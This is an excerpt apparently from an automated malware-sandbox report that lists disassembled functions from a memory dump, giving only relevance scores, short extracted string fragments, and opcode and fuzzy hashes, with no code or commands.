                                                                        Function 0363A0AC Relevance: 6.5, Strings: 5, Instructions: 236COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $22.&$e$h$o
                                                                        • API String ID: 0-4050626514
                                                                        • Opcode ID: 6ad97a0ef18ffdb0a8e074ceb63e0b2c2a09f54495d1a9155dd90af9c4ac186b
                                                                        • Instruction ID: adea9512667fb1f5741d7c976cc8058475e2f85c30cbab6919f960c6054fee76
                                                                        • Opcode Fuzzy Hash: 6ad97a0ef18ffdb0a8e074ceb63e0b2c2a09f54495d1a9155dd90af9c4ac186b
                                                                        • Instruction Fuzzy Hash: C48165B6D103187ADB65EBA4DC45FEF737DEF49200F00419EA509AA140EB745B888FA5
                                                                        Function 0363976C Relevance: 5.3, Strings: 4, Instructions: 302COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $e$k$o
                                                                        • API String ID: 0-3624523832
                                                                        • Opcode ID: ddb48f4dad444aef318c310d4304ebe094a46bcfe36c38e74dc93c18250fc283
                                                                        • Instruction ID: 7b9a29e204d2ce2e0b32cb830ff16a296eb81f1257564421193f74b345c62e9d
                                                                        • Opcode Fuzzy Hash: ddb48f4dad444aef318c310d4304ebe094a46bcfe36c38e74dc93c18250fc283
                                                                        • Instruction Fuzzy Hash: 77B10AB5A00308AFDB24DBA4CD85FEFB7FDAF89700F148558E619A7280D775AA41CB50
                                                                        Function 03639629 Relevance: 5.1, Strings: 4, Instructions: 121COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                        • API String ID: 0-2877786613
                                                                        • Opcode ID: b873b6dcbcdaf5eb66698c0d79f234267d372b755d34f07e5ec97343f658fcb0
                                                                        • Instruction ID: 64fc64344cf210db52183ef4db121d7685ec1368793ad07764fcddce79006758
                                                                        • Opcode Fuzzy Hash: b873b6dcbcdaf5eb66698c0d79f234267d372b755d34f07e5ec97343f658fcb0
                                                                        • Instruction Fuzzy Hash: B7414F75D512187EEB01EBD1CC41FFF7B7C9F96700F004048FA146A281D7B4AA1587AA
                                                                        Function 0363962C Relevance: 5.1, Strings: 4, Instructions: 120COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                        • API String ID: 0-2877786613
                                                                        • Opcode ID: d1e4cb8a1cd9b945f2a9167e0fe92997f972ada649dd1345bdfb2ebb4f84d0b4
                                                                        • Instruction ID: a50243684f70f6757c45e4ac24923e992bf3e8651be8fff47b8e14a7b9e3389b
                                                                        • Opcode Fuzzy Hash: d1e4cb8a1cd9b945f2a9167e0fe92997f972ada649dd1345bdfb2ebb4f84d0b4
                                                                        • Instruction Fuzzy Hash: 5C313075D512187AEB01EBD5CC41FEF7B7C9F96700F004048FA146A281E7B4AA1587EE
                                                                        Function 03622E92 Relevance: 5.1, Strings: 4, Instructions: 58COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @MSJ$@MSJ$WRWF$}
                                                                        • API String ID: 0-3893029086
                                                                        • Opcode ID: d770e76913523d9a0e6f9e7fb87dacc2061b48b81cf5bb6f09eaf32ca8916fdc
                                                                        • Instruction ID: 53dece8c3ba8a53f3676fb77188e2468869f30c1199e5f1dffd4b3640a1ebf22
                                                                        • Opcode Fuzzy Hash: d770e76913523d9a0e6f9e7fb87dacc2061b48b81cf5bb6f09eaf32ca8916fdc
                                                                        • Instruction Fuzzy Hash: E131ECB1D452889ACB20CFE5DA842DEFFB1BB04214F65865CC02A7F641CB365646CF99
                                                                        Function 03622E8E Relevance: 5.0, Strings: 4, Instructions: 44COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @MSJ$@MSJ$WRWF$}
                                                                        • API String ID: 0-3893029086
                                                                        • Opcode ID: 148b59ae8278dedfcc3aacbd89a4a2b3657992f201311d6deb714e2bb7a628c0
                                                                        • Instruction ID: 4282ba3b1e0792db67c1c31c8734993fe2ac1c6943069f1b6dfaae51aaebb901
                                                                        • Opcode Fuzzy Hash: 148b59ae8278dedfcc3aacbd89a4a2b3657992f201311d6deb714e2bb7a628c0
                                                                        • Instruction Fuzzy Hash: 1A110FB1C45288DACF14CFC1DA802DEBFB0FF09614FA58948D5167F601CB3A5A528F9A
                                                                        Function 0362772C Relevance: 5.0, Strings: 4, Instructions: 35COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "3G$0:$HD$ZI|n
                                                                        • API String ID: 0-3571891404
                                                                        • Opcode ID: 8b21d6adb2704bcb7510e9a72687f1609da77863edf2c5f4b6906bfa7c850a13
                                                                        • Instruction ID: 10aaa8b74fbecb7b2f9b51f336f3a75b2d8f595e9d1576cd3e69b2763818cd26
                                                                        • Opcode Fuzzy Hash: 8b21d6adb2704bcb7510e9a72687f1609da77863edf2c5f4b6906bfa7c850a13
                                                                        • Instruction Fuzzy Hash: E6F069B1D51318ABEB10FFD9C9019DEBB78EF1A300F504048E9503B241E7B04A508BEA
                                                                        Function 03627728 Relevance: 5.0, Strings: 4, Instructions: 34COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_33a0000_GJFjqeGumqI.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "3G$0:$HD$ZI|n
                                                                        • API String ID: 0-3571891404
                                                                        • Opcode ID: 1baf609e2e7e62307b4c6765a7af676f0a15956ff22ac2eb8ba13b83bab2f53f
                                                                        • Instruction ID: 2db12d1b0b48e4056ad9b92161cb34c4708a40679000b9ca172ef66217ecec1c
                                                                        • Opcode Fuzzy Hash: 1baf609e2e7e62307b4c6765a7af676f0a15956ff22ac2eb8ba13b83bab2f53f
                                                                        • Instruction Fuzzy Hash: A30169B1D51228AFEB11EFC5C9419DEBB78EF1A300F554148E9117F242D7B04A008FE6